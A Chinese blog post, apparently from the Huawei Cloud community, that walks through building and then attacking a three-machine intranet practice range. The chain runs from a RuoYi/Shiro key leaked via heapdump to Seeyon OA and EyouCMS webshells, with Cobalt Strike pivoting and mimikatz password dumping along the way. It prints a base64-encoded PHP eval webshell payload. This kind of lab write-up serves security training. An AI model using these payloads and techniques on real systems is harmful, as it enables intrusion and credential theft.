靶场学习 - 自建三层内网靶场

举报
亿人安全 发表于 2023/05/11 22:23:45 2023/05/11
【摘要】 自建内网靶场https://github.com/yangzongzhuan/RuoYi/releasesruoyi-admin\target\classes\application-druid.yml修改数据库账号密码idea 编译生成适配环境的 jar 包数据库配置推荐:mysql5+、jdk1.8新建数据库 ry,导入 sql 目录的两个 sql 文件成功运行检索 cipherKey ...

自建内网靶场

image-20230221150454020

https://github.com/yangzongzhuan/RuoYi/releases

image-20230220111012642

ruoyi-admin\target\classes\application-druid.yml

修改数据库账号密码

image-20230220150619005

idea 编译生成适配环境的 jar 包

数据库配置推荐:mysql5+、jdk1.8

新建数据库 ry,导入 sql 目录的两个 sql 文件

image-20230220150801373

image-20230220150602726

成功运行

image-20230220150826723

检索 cipherKey 替换 key

image-20230220151542714

除此以外,为了搭建存在的漏洞环境,还需要在 pom.xml 修改 shiro 的版本为有漏洞的版本

生成 heapdump

PLAINTEXT

1
C:\Program Files\Java\jdk1.8.0_301\bin>jmap -dump:file=C:\Users\Public\heapdump <pid>

image-20230220155721867

这样 heapdump 中便带有了 shiro 的 key

入口机器

80 端口为若依系统,8081 端口为 tomcat 管理界面

若依使用的是 4.6 的版本,存在前台 shiro 漏洞利用,但是 key 被修改了

image-20230221132142725

对 8081 端口 tomcat 页面进行目录扫描,发现存在 heapdump

image-20230221145005728

使用工具进行利用,发现泄露的 shiro key

image-20230221144854421

利用的时候记得勾选 AES GCM 不然会利用不成功

image-20230220152624644

内存马连接后上线 cs

image-20230221135454576

对内网资产进行扫描

image-20230221133601289

第二台机器

访问 192.168.1.3:81 发现是致远 oa

image-20230221133923517

使用历史漏洞 ajax.do 成功写入 webshell

image-20230221134219310

使用天蝎进行连接

image-20230221135300965

使用 cs 建立 smb 隧道,生成正向 beacon 到致远机器上运行

image-20230221135600970

或者通过 tcp 回连

image-20230221144338524

mimikatz 抓取密码,发现存在 zzz 账户

image-20230221144311377

登录 zzz 账户,在桌面上发现第二个 flag

image-20230221144555604

第三台机器

并且通过浏览器记录发现其曾访问过 http://192.168.2.3/,并保存了密码,指纹识别为 eyoucms

eyoucms1.5.5 存在后台 getshell 漏洞,尝试进行利用

image-20230221095300470

image-20230221095324769

image-20230221095344799

写入 webshell,连接成功后拿到第三个 flag

PLAINTEXT

1
<?=file_put_contents("./sx1.php",base64_decode("PD9waHAKZXZhbCgkX1BPU1RbInBhc3MiXSk7"));

image-20230221094851112

image-20230221100024309

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。